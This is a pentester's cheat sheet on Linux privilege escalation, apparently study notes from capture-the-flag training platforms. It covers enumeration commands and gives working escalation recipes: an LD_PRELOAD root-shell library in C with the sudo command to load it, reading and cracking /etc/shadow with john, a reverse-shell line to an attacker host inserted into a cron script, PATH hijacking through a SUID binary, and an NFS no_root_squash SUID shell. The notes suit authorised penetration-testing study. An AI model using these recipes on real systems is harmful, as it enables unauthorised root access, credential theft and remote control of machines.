Pentest Notes / Privilege Escalation
Linux Privilege Escalation
Tools
• LinPEAS: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
• LinEnum: https://github.com/rebootuser/LinEnum.git
• linuxprivchecker: https://github.com/sleventyeleven/linuxprivchecker
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
• Linpill: https://academy.hackthebox.com/app/module/296/section/3399 resources section. Pillaging script : overview of what exists on the system.
Enumeration
uname -a : Additional detail about the kernel.
uname -r : Print the version of linux.
/proc/version : Info on system processes. Checks if GCC is there or not
sudo -l : list all commands a user can run using sudo
/etc/passwd : Shows the users in the system and needed for password cracking
Useful find commands:
find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users) find / -perm a=x: find executable files
find /home -user frank: find all files for user “frank” under “/home” Use the “find” command with [2>/dev/null] to redirect errors to “/dev/null” and have a cleaner output. Folders and files that can be written to or executed from: find / -writable -type d 2>/dev/null : Find world-writeable folders find / -perm -222 -type d 2>/dev/null: Find world-writeable folders find / -perm -o w -type d 2>/dev/null: Find world-writeable folders
find / -perm -o x -type d 2>/dev/null : Find world-executable folders
IMP
find / -perm -u=s -type f 2>/dev/null : Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.
Privilege Escalation: Kernel Exploits
Be very specific about the kernel version when searching for exploits on Google, Exploit-db, or searchsploit.
Some exploit codes can make irreversible changes to the system.
To transfer the exploit code: Use SimpleHTTPServer Python module (Runs on port 8000) and wget.
python3 -m http.server
Privilege Escalation: Sudo
To check programs that can be run as root user:
sudo -l
MOST IMPORTANT: https://gtfobins.github.io/ : how a program that has sudo or suid rights, can be used to get root shell.
LD_PRELOAD:
"env_keep" option must be enabled.
shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Use this with any program that can be run as sudo.
sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
# find can be replaced with any program that has sudo access
Privilege Escalation: SUID
List files that have SUID or SGID bits set:
find / -type f -perm -04000 -ls 2>/dev/null
Use GTFOBins to see if any program can be exploited with SUID.
Base64, vim, nano can be used to read root files: /etc/shadow and /etc/passwd
With these, we can crack the password using john:
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt
Privilege Escalation: Capabilities
To list capabilities:
getcap -r / 2>/dev/null
Use GTFOBins to exploit it.
Privilege Escalation: Cron Jobs
To list the cron jobs:
cat /etc/crontab
Modify the script to send a reverse shell back:
#!/bin/bash
bash -i >& /dev/tcp/[attacker_ip]/[PORT] 0>&1
Privilege Escalation: PATH
First find writable folders:
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
Easiest folder to write to: /tmp
Export it to the PATH if it is not
export PATH=/tmp:$PATH
Create an executable script in the writable folder:
echo "/bin/bash" > thm
chmod 777 thm
Then create a script where you can set the SUID bit:
"thm" should be the same name as the name as above file:
#include<unistd.h>
void main(){
setuid(0);
setgid(0);
system("thm");
}
Run the executable to obtain the shell:
./thm
Privilege Escalation: NFS
To see if network file sharing is enabled:
cat /etc/exports
"no_root_squash" must be present
Start by enumerating mountable shares from our attacking machine:
showmount -e [target_IP]
Create a directory in your machine and mount it to the target's nfs folder:
mkdir /tmp/backupattack
mount -o rw [target_IP]:/[nfs_folder] /tmp/backupattack
Script that runs /bin/bash on the target system:
int main(){
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
Compile the code and set the SUID bit:
gcc nfs.c -o nfs
chmod +s nfs
This will be visible in [nfs_folder] in the target machine
Run the file and you have your root shell